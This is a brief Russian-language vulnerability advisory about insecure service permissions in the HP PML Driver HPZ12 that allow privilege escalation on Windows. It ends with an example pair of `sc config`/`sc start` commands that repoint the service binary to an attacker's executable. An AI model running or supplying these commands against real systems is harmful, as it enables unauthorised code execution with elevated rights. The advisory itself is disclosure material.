Программа: HP PML Driver HPZ12

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код с повышенными привилегиями на целевой системе. Уязвимость существует из-за того, что небезопасные полномочия SERVICE_CHANGE_CONFIG присваиваются для сервисов UPNPHost, NetBT, SCardSvr, DHCP, DnsCache и SSDPSRV. Атакующий может запустить произвольную программу во время перезапуска затронутого сервиса.

Пример:

C:\sc config "pml driver hpz12" binpath= D:\attack\attack.exe
C:\sc start "pml driver hpz12"

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии